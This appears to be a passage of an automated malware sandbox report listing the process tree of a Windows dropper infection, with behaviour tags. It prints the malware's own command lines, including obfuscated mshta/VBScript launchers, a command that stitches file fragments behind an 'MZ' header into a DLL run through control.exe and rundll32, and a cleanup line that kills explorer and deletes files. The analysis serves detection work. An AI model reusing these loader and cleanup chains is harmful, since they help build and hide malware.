                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x108,0x10c,0x110,0xdc,0x114,0x7ffca57246f8,0x7ffca5724708,0x7ffca5724718
                                                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                                                            PID:5092
                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe
                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart
                                                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        PID:2264
                                                                                                                                                                                                                                                                        • C:\66cb58917ec17ad1527490e29caeec\Setup.exe
                                                                                                                                                                                                                                                                          C:\66cb58917ec17ad1527490e29caeec\\Setup.exe /q /norestart /x86 /x64 /web
                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                          PID:4328
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c Thu164ba03be19.exe
                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                PID:3384
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu164ba03be19.exe
                                                                                                                                                                                                                                                                  Thu164ba03be19.exe
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                  PID:1520
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu164ba03be19.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu164ba03be19.exe
                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                    PID:1772
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu164ba03be19.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu164ba03be19.exe
                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                      PID:2776
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Thu1653d94a8da.exe
                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                    PID:4400
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu1653d94a8da.exe
                                                                                                                                                                                                                                                                      Thu1653d94a8da.exe
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                                                      PID:2932
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                        "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu1653d94a8da.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu1653d94a8da.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                          PID:3532
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu1653d94a8da.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu1653d94a8da.exe" ) do taskkill /F -Im "%~NxU"
                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                              PID:3340
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\09xU.exE
                                                                                                                                                                                                                                                                                09xU.EXE -pPtzyIkqLZoCarb5ew
                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                PID:772
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                                    PID:4704
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"
                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                        PID:1944
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )
                                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                                        PID:3412
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                            PID:5852
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
                                                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                                                PID:1788
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                                  PID:3920
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\control.exe
                                                                                                                                                                                                                                                                                                  control .\R6f7sE.I
                                                                                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                                                                                    PID:1528
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
                                                                                                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                                                      PID:1280
                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\RunDll32.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
                                                                                                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                                                                                                          PID:1312
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
                                                                                                                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                                                                                                                              PID:5000
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                  taskkill /F -Im "Thu1653d94a8da.exe"
                                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                  PID:864
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c Thu167d514d2a7ac5a.exe
                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                          PID:4212
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu167d514d2a7ac5a.exe
                                                                                                                                                                                                                                                                                            Thu167d514d2a7ac5a.exe
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                            PID:3108
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c Thu16f584bd3686.exe
                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                          PID:2056
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c Thu16466b26f8b7.exe
                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                          PID:1468
                                                                                                                                                                                                                                                                                  • C:\Windows\System32\Upfc.exe
                                                                                                                                                                                                                                                                                    C:\Windows\System32\Upfc.exe /launchtype periodic /cv 25y1SdoBZEKwsHgy6qEapg.0
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:4640
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalService -s W32Time
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                      PID:4128
                                                                                                                                                                                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                      PID:2456
                                                                                                                                                                                                                                                                                    • C:\Windows\System32\sihclient.exe
                                                                                                                                                                                                                                                                                      C:\Windows\System32\sihclient.exe /cv pVzHgpXms02TJxnTGiup5w.0.2
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                      PID:3528
                                                                                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:3960
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu16466b26f8b7.exe
                                                                                                                                                                                                                                                                                        Thu16466b26f8b7.exe
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                        PID:4296
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4296 -s 308
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                                                                                                                                          PID:3980
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS429079F3\Thu16f584bd3686.exe
                                                                                                                                                                                                                                                                                        Thu16f584bd3686.exe
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                        PID:4000
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                        PID:3184
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                          PID:2532
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2532 -s 212
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                                                                                                                                            PID:1060
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 3332 -ip 3332
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                        PID:4868
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1068 -ip 1068
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                        PID:2192
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3408 -ip 3408
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                        PID:4040
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4296 -ip 4296
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                        PID:4640
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 2532 -ip 2532
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                        PID:2716
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 6120 -ip 6120
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                        PID:2616
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6132 -ip 6132
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                          PID:4240
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5272 -ip 5272
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                          PID:5612
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5700 -ip 5700
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                          PID:1472
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5300 -ip 5300
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                          PID:2976
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5428 -ip 5428
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                          PID:2064
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5492 -ip 5492
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                          PID:6804
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2452 -ip 2452
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                          PID:3124
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6048 -ip 6048
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                          PID:6240
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\EE1A.exe
                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\EE1A.exe
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                          PID:5512
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\EE1A.exe
                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\EE1A.exe
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                            PID:3380
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4788 -ip 4788
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                          PID:6208
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\462.exe
                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\462.exe
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                          PID:4868
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\462.exe
                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\462.exe
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                              PID:1176
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                            C:\Windows\system32\WerFault.exe -pss -s 420 -p 6088 -ip 6088
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                              PID:5464
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\3769.exe
                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\3769.exe
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                PID:3104
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 236
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                  • Program crash
                                                                                                                                                                                                                                                                                                  PID:5748
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\4D35.exe
                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\4D35.exe
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                PID:1616
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\6755.exe
                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\6755.exe
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                  PID:7068
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 7068 -s 236
                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                    PID:6296
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7A03.exe
                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7A03.exe
                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                    PID:3148
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3148 -s 300
                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                      PID:2068
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\8E29.exe
                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\8E29.exe
                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                      PID:1744
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1744 -s 240
                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                        PID:7024
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3104 -ip 3104
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                      PID:7080
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 7068 -ip 7068
                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                        PID:4788
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\9D1E.exe
                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\9D1E.exe
                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                        PID:1468
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                          "C:\Windows\SysWOW64\explorer.exe"
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                            PID:5020
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im explorer.exe /f & timeout /t 6 & del /f /q "C:\Windows\SysWOW64\explorer.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                PID:5312
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                  taskkill /im explorer.exe /f
                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                  PID:4324
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                  timeout /t 6
                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                  PID:3348
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                                              "C:\Windows\SysWOW64\explorer.exe"
                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                              PID:6864
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\A0B9.exe
                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\A0B9.exe
                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                              PID:804
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 3148 -ip 3148
                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                              PID:6100
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1744 -ip 1744
                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                              PID:4808
                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                                                                                              1⤵
